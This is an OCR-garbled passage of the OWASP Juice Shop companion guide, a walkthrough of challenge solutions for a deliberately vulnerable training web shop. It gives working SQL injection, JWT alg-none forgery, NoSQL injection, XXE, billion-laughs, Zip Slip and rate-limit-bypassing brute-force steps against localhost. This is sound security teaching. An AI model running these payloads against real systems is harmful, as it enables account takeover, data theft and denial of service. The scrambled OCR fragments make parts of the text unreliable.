GVmYXVSdC5zdme {LCJOb3RWU2V3cmVOIJ04 1iwiY3J1YXR1ZEFOI30iM3 AxOSOWMyOyNC 
AxOToxMjowOC4zMTcgKkzAw0jAvI ividxi FOT30iMj A&xOSOwMyOyNCAxOTox¥j0 
wOC42MTegKzAwO} AvInOs ImlhdC I EMTU: zMiviZXhvIjoxNTUZNDcyNzMyfO. M 
Vefks6kovbJOHrYXq_FEnZpnDTvxHSk30Y49qrC iq AVERphNOWA4KJ 5KOr5XNuqKbu80 
Ph5gHepniQlKtOhmkbxP1J-GgaKGNWvtOtW-jyDdZaéuiJQvlf2Xc5g8_qUZpZg8IVmGV 
SEWTB2nYu241_5KxaZpjSg-b8Vmap05g 


"0.0.0.0", "profileImage" 




















7 7 
B A A E Mmreasarchte | omatcres | 0 (les) E E pea search te: o matches 
Done 426 bytes 91 milis 





2. Add a URL parameter called "callback". This will cause the API to return the 
content as a JavaScript fragment (JSONP) rather than just a standard JSON 
object. 
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{ Target | Proxy | Spider | Scanner | intruder | Repeater] Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts | JSON Beautiier | Logger-- | 


(fal 























Go Cancel <ir >i" Target: https: /juice-shop.herokuapp.com (4) [2] 
Request Response 
[Rawi] Params | Headers | Hex | Raw\| Headers | Hex | 
GET /xest/user/whoami?callback=anynane HTTP/1.1 7 200 OK 


: Juice-shop.herokuapp.com 








close 
pplication/jaon, text/plain, 








Origin: * 
Options: nosniff 

SAMEORIGIN 

t/javascript; charset=utt-8 


eyd2dGFOdXMi 01d 2aWNj 2x2 Ti 
uYW11T}0iTiviZWihaWwi0idib2JAYmSiLmNvbST 
MTRLOT92 YTOO2DMzNagyY2E4NTInNTELLCIpcOF 
bWluljpmYWxzZSwibGFzdExvZ2 1uSXAL0i TL j AUMC4WT ivicHJvZmlsZUltYWd1IjoiZ 
GvmYXVsaC5 zdme 1LCJOb3PWU2VjcmVO1j0i1iviY3J1YAR1ZEFOI}0 iN} AxOSOwMyOyNC 
AxOTOxMJowOC4zMTcgKzAwOj AI ividXBRYXR12EFO130i¥3 AxOSOwMyOyNCAxOTOxM30 
wOC42MTegKsawO} AvInOs Imihdc TeMTULME 2MiviZXhwIjoxNTUZNDcyNzMyf0. M 
Vetks8kSvbdOHr YXq_FBnZpnDTvxHSk3 04SqrC iqr AVKRpHNOWA4K3 SKOr SMMuqkbus0o 
PhSgHSpniQLKt OhmkbxP 1J-GgaKGNWwtOtW-jyDaZaéuidQwlt2XcSq8_qUZpZq81VmGV 
SEWTB2nYu241_SKxaZp}Sq-b9Vmap0Sg 














d : 
BEG prre omatces | (2) E E E Deem o matches 
Done 474 bytes 190 millis 





Log in with the (non-existing) accountant without 
ever registering that user 


1. Go to http://localhost:3000/#/login and try logging in with Email ' and any 
Password while observing the Browser DevTools network tab. 

2. You will notice the SQL query for the login in the error being thrown: "sql": 
"SELECT * FROM Users WHERE email = ''' AND password = 
"339df5aeae5bc6ae557491e02619c5dd' AND deletedAt IS NULL" 

3. Solve Exfiltrate the entire DB schema definition via SQL Injection to learn the 
exact column names of the users table. 

4. Prepare a unzon setect payload what will a) ensure there is no result from 
the original query and b) will add the needed user on-the-fly using static 
values in the query. 

5. Log in with Email ' UNION SELECT * FROM (SELECT 15 as ‘id', '' as ‘username’, 
“accOunt4nt@juice-sh.op' as ‘email', '12345' as 'password', ‘accounting’ as ‘role’, 
"1.2.3.4' as 'lastLoginIp' , ‘default.svg' as ‘profileImage', '' as ‘totpSecret', 1 
as ‘'isActive', '1999-@8-16 14:14:41.644 +00:00' as ‘createdAt', '1999-@8-16 
14:33:41.930 +00:00' as ‘updatedAt', null as ‘'deletedAt')-- 

6. This will trick the application backend into handing out a valid JWT token and 
thus establishing a user session. 
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Retrieve the language file that never made it into 
production 


1. Monitoring the HTTP calls to the backend when switching languages tells you 


how the translations are loaded: 


o 


o 


o 


o 


o 


o 


http://localhost:3000/i18n/en.json 
http://localhost:3000/i18n/de_DE.json 
http://localhost:3000/i18n/nl_NL.json 
http://localhost:3000/i18n/zh_CN.json 
http://localhost:3000/i18n/zh_HK.json 
etc. 


2. It is obvious the language files are stored with the official locale as name 


using underscore notation. 


3. Nonetheless, even brute forcing all thinkable locale codes ( aa_aA, ab_AA,..., 


zz_ZY , zz_zz ) would still not solve the challenge. 


4. The hidden language is Klingon which is represented by a three-letter code 


tlh with the dummy country code aa. 
5. Request http://localhost:3000/i18n/tlh_AA.json to solve the challenge. 
majQa'! 


Instead of expanding your brute force pattern (which is not a very obvious 


decision to make) you can more easily find the solution to this challenge by 


investigating which languages are supported in the Juice Shop and how the 


translations are managed. This will quickly bring you over to 


https://crowdin.com/project/owasp-juice-shop which immediately spoilers Klingon 


as a supported language. Hovering over the corresponding flag will eventually 


spoiler the language code t1h_aa . 
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€E Start Own Project Explore a) @ |Login 








I Sjörn Kimminich (bkir 4 
Home Activity Discussions 
Translations: 
= as = £ 
German Azerbaijan’ Bulgarian Burmese 
100% m 0% s 
Description 
am —_ OWASP Juice Shop is an intentionally insecure 
E] ($) (a H = a 
wascript which ses z Si 
Chinese Simplified Chinese Traditional Czech Danish Dutch Fa ipt which encomipassss the ertire OWASP 
100% Hong Kong on am aa Top Ten and other severe security flaws. 
Details 
Source language: English 
. 
= + + = Users in project: 89 
Words to translate: 614 
Estonian Finnish Georgian Greek 
9 am ji a äi Created: 2 years ago 
Last Activity: 7 days ago 
— -a be Managers 
= = = = an x 
Björn Kimminich (bkimminich) 
Hebrew Hindi Hungarian Indonesian italian E Contact 
7% ” m sa oa 


Japanese Korean Latvian Lithuanian 


i > | © (E) 
alm = 
Norwegian Polish Portuguese Portuguese. Brazilian Romanian 


— = z5 


Russian Spanish Swedish Turkish Urdu (Pakistan) 
atu 100% 100% 7 Ole, 


crowdin.com/project/.../tlh-AA Plans 





g crowdin.com 


The Klingon language was originally created to add realism to a race of 
fictional aliens who inhabit the world of Star Trek, an American television 
and movie franchise. Although Klingons themselves have never existed, 
the Klingon language is real. It has developed from gibberish to a usable 
means of communication, complete with its own vocabulary, grammar, 
figures of speech, and even slang and regional dialects. Today it is spoken 


by humans all over the world, in many contexts.° 


Solve the 2FA challenge for user "wurstbrot" 


1. Access the administration section of the store while inspecting network traffic. 
2. You will learn the email address of the user in question is unsurprisingly 
wurstbrot@juice-sh.op . 
3. You will also notice that there is no information about any user's 2FA 
configuration in the responses from /api/users . 
4. Solve Retrieve a list of all user credentials via SQL Injection and keep its final 
attack payload ready. 
5. Change the one of the nu11 s in payload to hopefully find a column that 
contains the secret key for the 2FA setup: 
o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password, 2fa,null,null,null, 
null%20from%20users-- yields a 5ee error with sequelizeDatabaseError: 


SQLITE_ERROR: no such column: 2fa. 
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o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password ,2fakey,null, null, 
null,null%20from%20users-- fails with no such column: 2fakey . 

o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password ,2fasecret,null,n 
ull,null, null% 20from% 20users-- fails with no such column: 2fasecret . 

o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password,totp, null, null,null 
snull%20from%20users-- also fails with no such column: totp . 

o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password, totpkey,null,null, 
null,null%20from%20users-- fails again yielding no such column: totpkey . 

o http://localhost:3000/rest/products/search? 
q=%27))%20union%20select%20null,id,email, password, totpsecret,null,n 
ull,null,null%20from%20users-- finally succeeds with a 2ə9 response as 
this column exists! 

. In the response from http://localhost:3000/rest/products/search? 

q=%27))%20union%20select%20null,id,email, password ,totpsecret,null,null,n 

ull,null%20from%20users-- find the entry of user wurstbrot@juice-sh.op with 
"image" : "IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH" Whereas all other users have 
“image":"" set. 

. Using your favorite 2FA application (e.g. Google Authenticator) create a new 
entry, but instead of scanning any QR code type in the key 

IFTXE3SPOEYVURT2MRYGI52TKI4HC3KH manually. 

. Go to and use SQL Injection to log in with wurstbrot@juice-sh.op'-- aS 
Username and anything as Password. 

. You will be presented with the Two Factor Authentication input screen where 

you now have to type in the 6-digit code currently displayed on your 2FA app. 


223 


it TE 80% @ 17:05 


Google Authenticator 


t TFS 


319 863 


ice Shop (wurstbrot@juice 


Two Factor Authentication 


Enter the 6 digit token from your 2FA app 





10. After clicking Log in you are logged in and the challenge will be marked as 
solved! 


Forge an essentially unsigned JWT token 


1. Log in as any user to receive a valid JWT in the authorization header. 
2. Copy the JWT (i.e. everything after Bearer in the Authorization header) and 
decode it. 
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3. Under the payload property, change the email attribute in the JSON to 
jwtn3d@juice-sh.op . 

4. Change the value of the alg property inthe header part from Hs256 to 
none . 

5. Encode the header to base6s4ur1 . Similarly, encode the payload to 
base64url . base64url makes it URL safe, a regular Base64 encode might not 
work! 

6. Join the two strings obtained above with a . (dot symbol) and adda . at 
the end of the obtained string. So, effectively it becomes 

base64url (header) .base64url1 (payload). 

7. Change the authorization header of a subsequent request to the retrieved 
JWT (prefixed with Bearer as before) and submit the request. Alternatively 
you can set the token cookie to the JWT which be used to populate any 
future request with that header. 


Exploit OAuth 2.0 to log in with the Chief Information 
Security Officer's user account 


1. Visit http://ocalhost:3000/#/login and enter some known credentials. 

2. Tick the Remember me checkbox and Log in. 

3. Inspecting the application cookies shows a new email cookie storing the 
plaintext email address. 

4. Log out and go back to http://localhost:3000/#/login. Make sure Remember 
me is still ticked. 

5. Using ciso@juice-sh.op as Email and anything as Password perform a failed 
login attempt. 

6. Inspecting the email cookie shows it was set to ciso@juice-sh.op even when 
login failed. 

7. Inspecting any request being sent from now on you will notice a new custom 
HTTP header x-user-email: ciso@juice-sh.op . 

8. Now visit http://localhost:3000/#/login again, but this time choose the Log in 
with Google button to log in with your own Google account. 

9. Visit http://localhost:3000/#/contact and check the Author field to be surprised 
that you are logged in as ciso@juice-sh.op instead with your Google email 
address, because the OAuth integration for login will accept the 'X-User- 
Email' header as gospel regardless of the account that just logged in. 


If you do not own a Google account to log in with or are running the Juice Shop 
on a hostname that is not recognized, you can still solve this challenge by logging 
in regularly but add “oauth": true to the JSON payload post ed to 
http://localhost:3000/rest/user/login. 


All your orders are belong to us 


1. Open the network tab of your browser's DevTools. 
2. Visit http://localhost:3000/#/track-order and search for x to witness a GET 
request http://localhost:3000/rest/track-order/x being sent returning 


{"status":"success", "data": [{"orderId":"x"}]} . 
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3. Search for ' (single quote) as Order ID now. htip://localhost:3000/rest/track- 
order/' will throw an error 


OWASP Juice Shop (Express “*4.17.1) 


500 SyntaxError: Invalid or unexpected token 
at Function (<anonymous>) 
at Object $where (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist(DocumentMatcher js:419:23) 
at C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\DocumentMatcher js:211:46 
at fastForEachObject (C-\Data\GitHub\juice-shop\node_modules\fast js\object\forEach js-21:5) 
at fastForEach (C:\Data\GitHub\juice-shop\node_modules\fast js\forEach js:20:12) 
at compileDocumentSelector (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\DocumentMatcher js:203:25) 
at DocumentMatcher_compileSelector (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\DocumentMatcher js:153:14) 
at new DocumentMatcher (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\DocumentMatcher js:103:29) 
at CursorObservable_ensureMatcherSorter (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\Cursor js:265:23) 
at CursorObservable Cursor (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\Cursorjs:116:12) 
at new CursorObservable (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\CursorObservable js:67:90) 
at CollectionDelegate find (C:\Data\GitHub\juice-shop\node_modules\marsdbidist\CollectionDelegate js:117:14) 
at Collection find (C:\Data\GitHub\juice-shop\node_modules\marsdb\dist\Collection js:275:28) 
at C:\Data\GitHub\juice-shop\routes\trackOrder js-11:15 
at Layer.handle [as handle_request] (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\layerjs:95:5) 
at next (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\route js:137:13) 
at Route dispatch (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\route js:112:3) 
at Layer handle [as handle_request] (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\layerjs:95:5) 
at C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index js:281:22 
at param (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index js:354:14) 
at param (C:\Data\GitHubljuice-shop\node_modules\express\lib\router\index js:365:14) 
at Function process_params (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index.js:410:3) 
at next (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index js:275:10) 
at C:\Data\GitHub\juice-shop\routes\verify js:153:3 
at Layer. handle [as handle_request] (C:\Data\GitHub\juice-shop\node_modules\express'lib\router\layer.js:95:5) 








at trim_prefix (C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index js:317:13) 
at C:\Data\GitHub\juice-shop\node_modules\express\lib\router\index js:284:7 
at Function.process_params (C:\Data\GitHub\uice-shop\node_modules\express\lib\router\index js:335:12) 


4. Searching for '' (two single quotes) as Order ID now will let 
http://localhost:3000/rest/track-order/" throw an unexpected string error 
instead of the previous Invalid or unexpected token . 

5. While not stated anywhere in the error messages, it can be assumed with 
some MongoDB background that the query probably resembles something 
like { ¢$where: "property === '" + payload + "'" }. 

6. The required payload for the challenge needs to make sure all data is 
matched while squeezing itself into the query in a non-breaking way. 

7. Search for ' || true || ' resulting in http://localhost:3000/rest/track- 
order/'%20%/C%7C%20true%20%7 C%7C%20' which will in fact query and 
return all orders from the MarsDB. 


Perform a Remote Code Execution that would keep a 
less hardened application busy forever 


1. By manual or automated URL discovery you can find a Swagger API 
documentation hosted at http://localhost:3000/api-docs which describes the 
B2B API. 
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NextGen B2B API? = 


New & secure JSON-tased API for our enterprise customers, (Deprecates previously offered XML-based endpoints) 


servers 
bN v Authorize @ 


Order 4P! tor customer orders ; 


| Post | Jorders . 


Creste new customer order 








Parameters Try itout 


No parameters 


Request body applicationijson ~ 


Customer order to be placed 


Example value Scams 


PE SEE 





Responses 
Code Desorption Links 








applicationijson ~ 








Example value sonera 


a9d26352f8100f124747", 
an” 


"Sdo6acSetbd: 
“> "2e88-@1-29707 02:06.’ 














2. This API allows to post orders where the order lines can be sent as JSON 


objects ( orderLines ) but also as a String ( orderLinesData ). 
. The given example for orderLinesDate indicates that this String might be 


allowed to contain arbitrary JSON: [{"productId": 12, "quantity": 
10000, "CustomerReference": ["P00000001.2", "SM20180105|042"],"couponCode": 
"pes[Bh.u*t"},...] 


Order v { 


cid* string 





orderLines  OrderLines v [Orderline v { 
description: Ora line 





productId+ 


quantity+ 


customerReference 





H 
orderLinesData OrderLinesData v [orderli 





string 
productId": 12 " 


Order Line in customer spe: data format 


1 
Hi 


. Click the Try it out button and without changing anything click Execute to see 
if and how the API is working. This will give you a 401 error saying No 
Authorization header was found . 

. Go back to the application, log in as any user and copy your token from the 
Authorization Bearer header using your browser's DevTools. 

. Back at http://localhost:3000/api-docs/#/Order/post_orders click Authorize 
and paste your token into the value field. 

. Click Try it out and Execute to see a successful 2ee response. 

. An insecure JSON deserialization would execute any function call defined 
within the JSON String, so a possible payload for a DoS attack would be an 
endless loop. Replace the example code with {"orderLinesData": "(function 
dos() { while(true); })()"} in the Request Body field. Click Execute. 
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9. The server should eventually respond with a 2ee after roughly 2 seconds, 
because that is defined as a timeout so you do not really DoS your Juice 
Shop server. 

10. If your request successfully bumped into the infinite loop protection, the 
challenge is marked as solved. 


Reset the password of Bjoern's internal account via 
the Forgot Password mechanism 


1. Trying to find out who "Bjoern" might be should quickly lead you to the 
OWASP Juice Shop project leader and author of this ebook. 

2. Visit https://www.facebook.com/bjoern.kimminich to immediately learn that he 
is from the town of Uetersen in Germany. 

3. Visit https://gist.github.com/9045923 or https://pastebin.com/JLSEORFX to find 
the source code of a (truly amazing) game Bjoern wrote in Turbo Pascal in 
1995 (when he was a teenager) to learn his phone number area code of 
04122 which belongs to Uetersen. This is sufficient proof that you in fact are 
on the right track. 

4. http://www.geopostcodes.com/Uetersen will tell you that Uetersen has ZIP 
code 25436. 

5. Visit http://localhost:3000/#/forgot-password and provide bjoern@juice-sh.op 
as your Email. 

6. In the subsequently appearing form, provide 25436 as Your Z/P/postal code 
when you were a teenager? 

7. Type and New Password and matching Repeat New Password followed by 
hitting Change to not solve this challenge. 

8. Bjoern added some obscurity to his security answer by using an uncommon 
variant of the pre-unification format of postal codes in Germany. 

9. Visit http:/www.alte-postleitzahlen.de/uetersen to learn that Uetersen's old 
ZIP code was w-2e82 . This would not work as an answer either. Bjoern used 
the written out variation: west-2e82 . 

10. Change the answer to Your ZIP/postal code when you were a teenager? into 
west-2082 and click Change again to finally solve this challenge. 


Postal codes in Germany 


Postal codes in Germany, Postleitzahl (plural Postleitzahlen, abbreviated to 
PLZ; literally "postal routing number"), since 1 July 1993 consist of five 
digits. The first two digits indicate the wider area, the last three digits the 
postal district. 


Before reunification, both the Federal Republic of Germany (FRG) and the 
German Democratic Republic (GDR) used four-digit codes. Under a 
transitional arrangement following reunification, between 1989 and 1993 
postal codes in the west were prefixed with 'W', e.g.: W-1000 [Berlin] 30 
(postal districts in western cities were separate from the postal code) and 
those in the east with 'O' (for Ost), e.g.: O-1xxx Berlin.* 
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Reset Morty's password via the Forgot Password 
mechanism 


1. Trying to find out who "Morty" might be should eventually lead you to Morty 
Smith as the most likely user identity 
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A) 





2. Visit http://rickandmorty.wikia.com/wiki/Morty and skim through the Family 
section 

3. It tells you that Morty had a dog named Snuffles which also goes by the alias 
of Snowball for a while. 

4. Visit http://localhost:3000/#/forgot-password and provide morty@juice-sh.op 
as your Email 

5. Create a word list of all mutations (including typical "leet-speak"-variations!) 
of the strings snuffles and snowball using only 
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o lower case ( a-z ) 
o upper case ( a-z ) 
o and digit characters ( ə-9 ) 

6. Write a script that iterates over the word list and sends well-formed requests 
to http://localhost:3000/rest/user/reset-password . A rate limiting mechanism 
will prevent you from sending more than 100 requests within 5 minutes, 
severely hampering your brute force attack. 

7. Change your script so that it provides a different x-Forwarded-For -header in 
each request, as this takes precedence over the client IP in determining the 
origin of a request. 

8. Rerun your script you will notice at some point that the answer to the security 
question is 5nowb41L and the challenge is marked as solved. 

9. Feel free to cancel the script execution at this point. 


M: If you do not want to write your own script for this challenge, take a look at 
juice-shop-mortys-question-brute-force.py which was kindly published as a Gist 
on GitHub by philly-vanilly. 


Leet (or "1337"), also known as eleet or leetspeak, is a system of modified 
spellings and verbiage used primarily on the Internet for many phonetic 
languages. It uses some alphabetic characters to replace others in ways 
thdev at play on the similarity of their glyphs via reflection or other 
resemblance. Additionally, it modifies certain words based on a system of 
suffixes and alternative meanings. 


The term "leet" is derived from the word elite. The leet lexicon involves a 
specialized form of symbolic writing. For example, leet spellings of the word 
leet include 1337 and I33t; eleet may be spelled 31337 or 3133t. Leet may 
also be considered a substitution cipher, although many dialects or 


linguistic varieties exist in different online communities.” 


Deprive the shop of earnings by downloading the 
blueprint for one of its products 


1. The description of the OWASP Juice Shop Logo (3D-printed) product 
indicates that this product might actually have kind of a blueprint 

2. Download the product image from 
http://localhost:3000/public/images/products/3d_keychain.jpg and view its 
Exif metadata 
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= Eigenschaften von 3d_keychain.jpg 


| Allgemein | Sicherheit) Details 

























| Eigenschaft 
| Bild 
BildID 
Abmessungen 
Breite 
Hohe 
Horizontale Auflösung 
Vertikale Auflösung 
| Bittiefe 
Komprimierung 
Auflösungseinheit 
Farbdarstellung 
Komprimierte Bits/Pixel 



















Kamera 








Kamerahersteller 
| Kameramodell 
Blendenzahl 
| Belichtungszeit 
| ISO-Filmempfing 








3. Researching the camera model entry OpenSCAD reveals that this is a 
program to create 3D models, which works with .stı files 

4. As no further hint on the blueprint filename or anything is given, a lucky 
guess or brute force attack is your only choice 

5. Download http://localhost:3000/public/images/products/JuiceShop.stl to solve 
this challenge 

6. This model will actually allow you to 3D-print your own OWASP Juice Shop 
logo models! 
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The official place to retrieve this and other media or artwork files from the Juice 
Shop (and other OWASP projects or chapters) is 
https://github.com/OWASP/owasp-swag. There you can not only find the 3D 
model leaked from this challenge, but also one that comes with a dedicated hole 
to mount it on your keyring! 


Inform the development team about a danger to some 
of their credentials 


1. Solve Access a developer's forgotten backup file 

2. The package.json.bak contains not only runtime dependencies but also 
development dependencies under the devDependencies section. 

3. Go through the list of devDependencies and perform research on vulnerabilities 
in them which would allow a Software Supply Chain Attack. 

4. For the eslint-scope module you will learn about one such incident exactly in 
the pinned version 3.7.2 , €.g. 
https://status.npmjs.org/incidents/dn7c1fgrr7ng or 
https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes 

5. Both above links refer to the original report of this vulnerability on GitHub: 
https://github.com/eslint/eslint-scope/issues/39 

6. Visit http://localhost:3000/#/contact 

7. Submit your feedback with https://github.com/eslint/eslint-scope/issues/39 in 
the comment to solve this challenge 


Inform the shop about a typosquatting imposter that 
dug itself deep into the frontend 


1. Request http://localhost:3000/3rdpartylicenses.txt to retrieve the 3rd party 
license list generated by Angular CLI by default 

2. Combing through the list of modules you will come across _ng2-bar-rating 
which openly reveals its intent on https://www.npmjs.com/package/ng2-bar- 








rating 
ng2-bar-rating 
1.1.50 » Public • Published 4 months ago 
Readme Admin 0 Dependencies © Dependents 7 Versions 
install 
npm i ng2-bar-rating 
eekly downloads 
137 hod A 
Angular Bar Rating yee ‘ae 
Minimal, light-weight Angular ratings. TEREN ie 
ine il 1 
homepas epository 
github.com @ github 


last publish 


4 months ago 


collai 


yrators 





Eo 


THIS IS NOT THE MODULE YOU ARE LOOKING FOR! Please use 


https://github.com/MurhafSousli/ngx-bar-rating! This repository exists only for security OMG 9 HOMIE 


awareness and training purposes to demonstrate the issue of typosquatting within the 
: ee Report a vulnerability 
OWASP Juice Shop! Please check out https://github.com/bkimminich/juice- 


shop/issues/368 and https://iamakulov.com/notes/npm-malicious-packages/ for more 


information! 
Table of Contents 
e Live Demo 


3. Visit http://localhost:3000/#/contact 
4. Submit your feedback with ng2-bar-rating in the comment to solve this 
challenge 
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You can probably imagine that the typosquatted ng2-bar-rating would be a lot 
harder to distinguish from the original repository ngx-bar-rating , if it where not 
marked with the THIS IS NOT THE MODULE YOU ARE LOOKING FORI-warning 
at the very top. Below you can see the original ngx-bar-rating module page on 
NPM: 








ngx-bar-rating 
1.1.0 + Public + Published a year ago 
Readme 0 Dependencies 0 Dependents 4 Versions 
npm i ngx-bar-rating 
75 — N 
Angular Bar Rating ne we 
Minimal, light-weight Angular ratings. Seen. PERAN: 
Corro me il 1 
homepage eposito 
Table of Contents github.com ® github 
e Live Demo last publish 
* Installation ayear ago 
» Usage 
e Options collaborators 
e Themes 


* Author 
Ð Test with RunKit 


Installation 


Report a vulnerability 
Install it with npm 


npm install --save ngx-bar-rating 


SystemJS 


If you are using SystemJS, you should also adjust your configuration to point to the UMD bundle. 


Give the server something to chew on for quite a 
while 


1. Solve the Use a deprecated B2B interface that was not properly shut down 
challenge. 

2. On Linux, prepare an XML file which defines and uses an external entity 
which will require a long time to resolve: <!ENTITY xxe SYSTEM 
"file:///dev/random"> . On Windows there is no similar feature to retrieve 
randomness from the OS via an "endless" file, so the attack vector has to be 
completely different. A quadratic blowup attack works fine, consisting of a 
single large entity like <!ENTITY a “dosdosdosdos...dos" > which is replicated 
very often as in <foo>&a; &a;&a;&a;&a;...&a;</foo> . 

3. Upload this file through the File Complaint dialog and observe how the 
request processing takes up to 2 seconds and then times out (to prevent you 
from actually DoS'ing your application) but still solving the challenge. 


You might feel tempted to try the classic Billion laughs attack but will quickly 
notice that the XML parser is hardened against it, giving you a status 410 HTTP 


error saying Detected an entity reference Loop . 
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In computer security, a billion laughs attack is a type of denial-of-service 
(DoS) attack which is aimed at parsers of XML documents. 


It is also referred to as an XML bomb or as an exponential entity expansion 
attack. 


The example attack consists of defining 10 entities, each defined as 
consisting of 10 of the previous entity, with the document consisting of a 
single instance of the largest entity, which expands to one billion copies of 
the first entity. 


In the most frequently cited example, the first entity is the string "lol", hence 
the name "billion laughs". The amount of computer memory used would 
likely exceed that available to the process parsing the XML (it certainly 
would have at the time the vulnerability was first reported). 


While the original form of the attack was aimed specifically at XML parsers, 
the term may be applicable to similar subjects as well. 


The problem was first reported as early as 2002, but began to be widely 
addressed in 2008. 


Defenses against this kind of attack include capping the memory allocated 
in an individual parser if loss of the document is acceptable, or treating 
entities symbolically and expanding them lazily only when (and to the 
extent) their content is to be used. 


<?xml version="1.0"?> 
<!DOCTYPE lolz [ 
<!ENTITY lol “lol"> 
<!ELEMENT lolz (#PCDATA)> 























<!ENTITY loll "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 

<!ENTITY 1ol2 "&1011;&1011;&1l011;&1011; &l011; &1lo011;&1lo11;&1lo011;&1lo011;&1lo11;"> 
<!ENTITY 1013 "&1012;&1012;&1012;&1l012; &l012;&1012;&1o012;&1l012;&1lo012;&1012;"> 
<!ENTITY 1014 "&1013;&1013;&1013;&1013;&1013; &1013; &1lo013;&1013;&1013;&1lo013; "> 
<!ENTITY 1015 "&1014;&1014;&1014;&1014;&1014; &1014;&1014;&1014;&1014;&1014; "> 
<!ENTITY 1016 "&1015;&1015;&1015;&1015;&1015;&1015;&1l015;&1015;&1l015;&1lo15; "> 
<!ENTITY 1017 "&1016;&1016;&1016;&1016; &1016; &1016;&1016;&1016; &1016;&1lo016; "> 
<!ENTITY 1018 "&1017;&1017;&1017;&1017; &1017 ; &1017;&1017;&1017;&1017;&1017;"> 
<!ENTITY 1019 "&1018;&1018;&1018;&1018; &1018; &1018;&1018;&1018; &1018;&1018; "> 
J> 

<lolz>&lo19;</lolz> 


> 


KKK IK Challenges 


Overwrite the Legal Information file 


1. Combing through the updates of the @owasp_juiceshop Twitter account you 
will notice https://twitter.com/owasp_juiceshop/status/1107781073575002112. 
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OWASP Juice Shop Ee 

@owasp_juiceshop x 
69 You have complaints about several 
orders? 


x Filing those individually was too time- 
consuming in the past? 


C We've got you covered with our 
convenient ZIP file upload! Visit /#/complain 
and try it today! 


®@ Complaining was never so easy and 
efficient! 


@ Tweet übersetzen 


00:09 - 19. Marz 2019 


3 Retweets 15 „Gefällt mir’-Angaben @ @ 3 Q F w 8 CF; + 


Q Q3 @ 15 4 


& Twittere deine Antwort 





. Researching ZIP-based vulnerabilities should also yield Zip Slip which 
exploits directory traversal filenames in file archives. 

. As the Legal Information file you need to override lives in 
http://localhost:3000/ftp/legal.md and uploading files via File Complaint does 
not give any feedback where they are stored, an iterative directory traversal 
approach is recommended. 

. Prepare a ZIP file (on Linux) with zip exploit.zip ../ftp/legal.md . 

. Log in as any user at http://localhost:3000/#/login. 

. Click Contact Us and Complain? to get to the File Complaint screen at 
http://localhost:3000/#/complain. 

. Type in any message and attach your ZIP file, then click Submit. 

. The challenge will not be solved. Repeat steps 5-7 but with zip exploit.zip 
../../#tp/legal.md as the payload. 

. The challenge will be marked as solved! When you visit 
http://localhost:3000/ftp/legal.md you will see your overwritten Legal 
Information! 
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Zip Slip is a form of directory traversal that can be exploited by extracting 
files from an archive. The premise of the directory traversal vulnerability is 
that an attacker can gain access to parts of the file system outside of the 
target folder in which they should reside. The attacker can then overwrite 
executable files and either invoke them remotely or wait for the system or 
user to call them, thus achieving remote command execution on the 
victim’s machine. The vulnerability can also cause damage by overwriting 
configuration files or other sensitive resources, and can be exploited on 
both client (user) machines and servers. 8 


Forge a coupon code that gives you a discount of at 
least 80% 


For this challenge there are actually two distinct solution paths that are both 
viable. These will be explained separately as they utilize totally different attack 
styles. 


Pattern analysis solution path 


1. Solve challenge Access a salesman's forgotten backup file to get the 

coupons_2013.md.bak file with old coupon codes which you find listed below. 

2. There is an obvious pattern in the last characters, as the first eleven codes 
end with gc7sn and the last with gc7ss . 

3. You can rightfully speculate that the last five characters represent the actual 
discount value. The change in the last character for the 12th code comes 
from a different (probably higher) discount in December! & 

4. Check the official Juice Shop Twitter account for a valid coupon code: 
https://twitter.com/owasp_juiceshop 

5. At the time of this writing - January 2017 - the broadcasted coupon was 

n<Mibh.u)v promising a 50% discount. 

6. Assuming that the discount value is encoded in the last 2-5 characters of the 
code, you could now start a trial-end-error or brute force attack generating 
codes and try redeeming them on the Your Basket page. At some point you 
will probably hit one that gives 80% or more discount. 

7. You need to Checkout after redeeming your code to solve the challenge. 


n<MibgC7sn 
mNYS#gC7sn 
o*IVigC7sn 
k#pD1gC7sn 
o*I]pgc7sn 
n(XRvgC7sn 
n(XLtgC7sn 
k#*AFgC7sn 
q:<IqgC7sn 
pEw8o0gC7sn 
pes[BgC7sn 
1}6D$gC7ss 


Reverse engineering solution path 
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. Going through the dependencies mentioned in package.json.bak you Can 
speculate that at least one of them could be involved in the coupon code 
generation. 

. Narrowing the dependencies down to crypto or hashing libraries you would 
end up with hashids , jsonwebtoken and zs5 as candidates. 

. It turns out that z85 (ZeroMQ Base-85 Encoding) was chosen as the coupon 
code-creation algorithm. 

. Visit httos:/www.npmjs.com/package/z85 and check the Dependents tab: 


z85 


9.0.2 + Public * Published 5 years ago 


Readme 0 Dependencies 4 Dependents 2 Versions 


Dependents (4) install 


+ npm i 285 
jify z85-cli zmq-zap ministers 


+ weekly downloads 


323 Dam, 
version license 
0.0.2 MIT 


5. If you have Node.js installed locally run npm install -g z85-cli to install 


https://www.npmjs.com/package/z85-cli - a simple command line interface for 


ZB5u. 
285-cli 
0.3.0 * Public + Published a year ago 
Readme Admin 1 Dependencies 0 Dependents 10 Versions 
285-cli mm eea install 






npm i z85-cli 


o a 








